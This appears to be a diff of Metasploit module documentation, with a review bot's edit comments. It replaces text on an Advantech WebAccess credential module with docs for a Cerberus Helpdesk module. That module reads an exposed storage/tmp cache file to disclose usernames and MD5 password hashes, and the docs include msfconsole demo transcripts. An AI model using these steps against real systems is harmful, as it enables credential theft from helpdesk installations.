1 | 1 | ## Description
|
2 | 2 |
|
3 |
| -This module exploits three vulnerabilities in Advantech WebAccess. |
| 3 | +This module opens a `devblocks_cache---ch_workers` or `zend_cache---ch_workers` file which contains a |
| 4 | +data structure with username and password hash (MD5) credentials. The contents looks similar to JSON, however it is not. |
4 | 5 |
|
5 |
| -The first vulnerability is the ability for an arbitrary user to access the admin user list page, |
6 |
| -revealing the username of every user on the system. |
7 |
| - |
8 |
| -The second vulnerability is the user edit page can be accessed loaded by an arbitrary user, with |
9 |
| -the data of an arbitrary user. |
10 |
| - |
11 |
| -The final vulnerability exploited is that the HTML Form on the user edit page contains the user's |
12 |
| -plain text password in the masked password input box. Typically the system should replace the |
13 |
| -actual password with a masked character such as "*". |
| 6 | +## Vulnerable Application |
14 | 7 |
|
| 8 | +This module has been verified against: |
15 | 9 |
|
16 |
| -## Vulnerable Application |
| 10 | +1. Version 4.2.3 Stable (Build 925) |
| 11 | +2. Version 5.4.4 |
17 | 12 |
|
18 |
| -Version 8.1 was tested during development: |
| 13 | +However it may also work up to, but no including, version 6.7 |
19 | 14 |
|
20 |
| -http://advcloudfiles.advantech.com/web/Download/webaccess/8.1/AdvantechWebAccessUSANode8.1_20151230.exe |
| 15 | +Version 5.4.4 is available on [exploit-db.com](https://www.exploit-db.com/apps/882596e791e54529b29ecbc6f48a6cb7-cerb5-5_4_4.zip) |
21 | 16 |
|
22 |
| -8.2 is not vulnerable to this. |
| 17 | +* of note, 5.4.4 has to be installed on a PRE php7 environment. |
23 | 18 |
|
24 | 19 | ## Verification Steps
|
25 | 20 |
|
26 | 21 | 1. Start msfconsole
|
27 |
| -2. ```use auxiliary/gahter/advantech_webaccess_creds``` |
28 |
| -3. ```set WEBACCESSUSER [USER]``` |
29 |
| -4. ```set WEBACCESSPASS [PASS]``` |
30 |
| -5. ```run``` |
31 |
| - |
32 |
| -## Options |
33 |
| - |
34 |
| -**WEBACCESSUSER** |
35 |
| - |
36 |
| -The username to use to log into Advantech WebAccess. By default, there is a built-in account |
37 |
| -```admin``` that you could use. |
38 |
| - |
39 |
| -**WEBACCESSPASS** |
40 |
| - |
41 |
| -The password to use to log into AdvanTech WebAccess. By default, the built-in account ```admin``` |
42 |
| -does not have a password, which could be something you can use. |
43 |
| - |
| 22 | +2. ```use auxiliary/gather/cerberus_helpdesk_hash_disclosure``` |
| 23 | +3. ```set rhosts``` |
| 24 | +4. ```run``` |
44 | 25 |
|
45 | 26 | ## Demo
|
46 | 27 |
|
47 |
| -msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure |
48 |
| -msf auxiliary(cerberus_helpdesk_hash_disclosure) > show options |
49 |
| - |
50 |
| -Module options (auxiliary/gather/cerberus_helpdesk_hash_disclosure): |
51 |
| - |
52 |
| - Name Current Setting Required Description |
53 |
| - ---- --------------- -------- ----------- |
54 |
| - Proxies no A proxy chain of format type:host:port[,type:host:port][...] |
55 |
| - RHOSTS yes The target address range or CIDR identifier |
56 |
| - RPORT 80 yes The target port (TCP) |
57 |
| - SSL false no Negotiate SSL/TLS for outgoing connections |
58 |
| - THREADS 1 yes The number of concurrent threads |
59 |
| - URI / no URL of the Cerberus Helpdesk root |
60 |
| - VHOST no HTTP server virtual host |
61 |
| - |
62 |
| -msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 10.90.5.81 |
63 |
| -rhosts => 10.90.5.81 |
64 |
| -msf auxiliary(cerberus_helpdesk_hash_disclosure) > run |
65 |
| - |
66 |
| -[-] Invalid response received for /storage/tmp/devblocks_cache---ch_workers |
67 |
| -[+] admin:aaa34a6111abf0bd1b1c4d7cd7ebb37b |
68 |
| -[+] example:112302c209fe8d73f502c132a3da2b1c |
69 |
| -[+] foobar:0d108d09e5bbe40aade3de5c81e9e9c7 |
| 28 | +### 4.2.3 using zend (not verbose) |
| 29 | + |
| 30 | + ``` |
| 31 | + msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure |
| 32 | + msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 1.1.1.1 |
| 33 | + rhosts => 1.1.1.1 |
| 34 | + msf auxiliary(cerberus_helpdesk_hash_disclosure) > run |
| 35 | + |
| 36 | + [-] Invalid response received for /storage/tmp/devblocks_cache---ch_workers |
| 37 | + [+] admin:aaa34a6111abf0bd1b1c4d7cd7ebb37b |
| 38 | + [+] example:112302c209fe8d73f502c132a3da2b1c |
| 39 | + [+] foobar:0d108d09e5bbe40aade3de5c81e9e9c7 |
| 40 | + ``` |
| 41 | + |
| 42 | +### 5.4.4 using devblocks |
| 43 | + |
| 44 | + ``` |
| 45 | + msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure |
| 46 | + rhost => 192.168.2.45 |
| 47 | + msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 192.168.2.45 |
| 48 | + rhosts => 192.168.2.45 |
| 49 | + msf auxiliary(cerberus_helpdesk_hash_disclosure) > set uri /cerb5/ |
| 50 | + uri => /cerb5/ |
| 51 | + msf auxiliary(cerberus_helpdesk_hash_disclosure) > set verbose true |
| 52 | + verbose => true |
| 53 | + msf auxiliary(cerberus_helpdesk_hash_disclosure) > run |
| 54 | + |
| 55 | + [*] Attempting to load data from /cerb5/storage/tmp/devblocks_cache---ch_workers |
| 56 | + [+] [email protected]:37b51d194a7513e45b56f6524f2d51f2 |
| 57 | + [+] [email protected]:acbd18db4cc2f85cedef654fccc4a4d8 |
| 58 | + [+] [email protected]:18126e7bd3f84b3f3e4df094def5b7de |
| 59 | + [*] Scanned 1 of 1 hosts (100% complete) |
| 60 | + [*] Auxiliary module execution completed |
| 61 | + ``` |
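Review bot: the 5.4.4 demo transcript (new line 46) carries a stray `rhost => 192.168.2.45` echo before the `set rhosts` command is shown; it is the output of a command that does not appear in the transcript and should be dropped so the demo matches what was typed. In the same hunk: new line 13 reads "up to, but no including, version 6.7" and should be "However, it may also work up to, but not including, version 6.7"; new lines 3-4 should read "The contents look similar to JSON", and it would help to say where the file lives, since the demo shows it is fetched from `storage/tmp/` under the Cerberus root; verification step 3 `set rhosts` should carry a placeholder the way the removed steps did (`set WEBACCESSUSER [USER]`), e.g. `set rhosts [IP]`, and a `set uri [PATH]` step is missing even though the 5.4.4 demo needs `set uri /cerb5/`; the removed `## Options` section has no replacement documenting `URI`, which the removed `show options` output described as "URL of the Cerberus Helpdesk root" and which is the one option a user of a non-root install must change; and new line 17 "* of note, 5.4.4 has to be installed on a PRE php7 environment." should be a plain sentence, e.g. "Note that 5.4.4 must be installed on a pre-PHP 7 environment."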